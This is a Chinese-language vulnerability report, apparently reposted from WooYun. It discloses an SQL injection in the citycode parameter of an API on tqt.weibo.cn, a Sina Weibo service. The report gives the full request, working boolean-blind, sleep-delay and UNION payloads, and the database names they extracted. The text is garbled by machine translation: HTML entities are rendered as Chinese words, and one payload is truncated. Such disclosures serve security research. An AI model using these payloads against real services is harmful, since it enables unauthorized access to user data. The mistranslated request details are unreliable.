漏洞标题 新浪微博某站MySQL注射(支持三种查询方式) 相关厂商 新浪微博 漏洞作者 Aasron 提交时间 2016-04-27 16:53 公开时间 2016-06-13 19:00 漏洞类型 …
漏洞标题
新浪微博站MySQL注入(支持三种查询方式)
相关制造商
新浪微博
漏洞作者
Aasron
提交时间
2016-04-27 16: 53
公共时间
2016-06-13 19: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Php +字符型注入,注入技术,Mysql
漏洞详细信息
GET /api.php?idfa=xxxx&lang=zh-Hans-CN&limit=20&pv=3.929&ts=1461744953.516815&sv=9.310&device_id=xx&method=comments.get&resolution=1242 %2A2208&安培;康恩=1&安培; tqt_userid=88511248&安培;签=XX&安培; UID=XXX&安培;载体=1&安培;时区=GMT%2B8&安培; PID=游离安培; citycode=CHXX0016&安培; API_KEY=517276d5c1d3c&安培; PT=3010&安培;设备=iPhone&安培; PD=tq HTTP/1.1
主持人: tqt.weibo.cn
接受语言: zh-Hans,en-us
用户代理:
连接:关闭
Accept-Encoding: gzip,deflate
播放xxx是我的敏感信息。
注射参数#citycode
漏洞证明:
布尔盲:'和6109=6109 AND'eHNv'='eHNy
延迟注射:'和(SELECT * FROM(SELECT(SLEEP(5)))* uk)和'zYAE'='zYAE
联合查询:'UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855
可用的数据库[3]:
[*] information_schema
[*]测试
[*] tianqitong
当前数据库:tianqitong
当前数据库用户:'[email protected]/*%'
修理计划:
过滤
版权声明:请注明出处Aasron @乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 535 )
- 分类:黑客技术